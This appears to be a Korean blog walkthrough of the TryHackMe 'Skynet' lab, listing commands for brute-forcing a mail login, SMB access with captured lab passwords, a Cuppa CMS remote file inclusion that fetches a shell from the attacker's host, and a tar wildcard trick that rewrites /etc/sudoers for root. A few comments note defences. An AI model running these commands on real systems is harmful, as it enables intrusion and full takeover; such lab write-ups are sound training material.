
THM - Offensive Pentesting-Skynet

병뚜 2023. 10. 24. 16:50

https://tryhackme.com/room/skynet

 

gobuster dir -u http://10.10.83.54/ -w /usr/share/wordlists/dirb/common.txt 

 

hydra 10.10.83.54 -l milesdyson -P ./log1.txt http-post-form '/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect' -V

 

smbclient //10.10.83.54/anonymous

 

10.10.83.54/squirrelmail

<Mail>

milesdyson

cyborg007haloterminator

 

smbclient //10.10.83.54/milesdyson -U milesdyson

password : )s{A&2Z=F^n_E.B`

 

gobuster dir -u http://10.10.83.54/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt 

 

searchsploit cuppa cms

searchsploit -m php/webapps/25971.txt (취약점 설명 문서를 현재 디렉터리로 복사해서 읽어보기)

 

http://10.10.83.54/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.176.117:8888/shell.php

 

# 쉘이 불안정하므로, 대화형 쉘(PTY)로 변경

python -c 'import pty;pty.spawn("/bin/bash")'

 

아무튼, backup.sh 내용

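tar를 이용하는데, https://gtfobins.github.io/gtfobins/tar/ 에서 tar로 할 수 있는 행위를 볼 수 있음. 아래 절차로 미루어 backup.sh가 root 권한으로 실행되면서 /var/www/html의 파일을 와일드카드(*)로 tar에 넘기는 것으로 보이며, 이 경우 '--'로 시작하는 파일명이 tar 옵션으로 해석되는 것이 근본 원인임. 방어 측면에서는 root로 실행되는 스크립트에서 `tar ... -- *` 또는 `./*`처럼 옵션과 파일명을 분리하고, 낮은 권한 계정이 쓸 수 있는 디렉터리를 root 작업이 그대로 처리하지 않도록 해야 함.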

 

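# sudoers 파일 수정: www-data가 패스워드 없이 root 권한으로 sudo 가능해짐. 이 줄은 root 권한으로 실행되어야 효과가 있으며, '>'는 /etc/sudoers 전체를 이 한 줄로 덮어쓰므로 기존 설정이 모두 사라짐. 방어 측면에서는 /etc/sudoers 및 /etc/sudoers.d 변경을 감시하면 이런 변조를 탐지할 수 있음.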

echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers 

echo "/var/www/html"  > "--checkpoint-action=exec=sh root.sh"

echo "/var/www/html"  > --checkpoint=1

 

#권한상승

sudo bash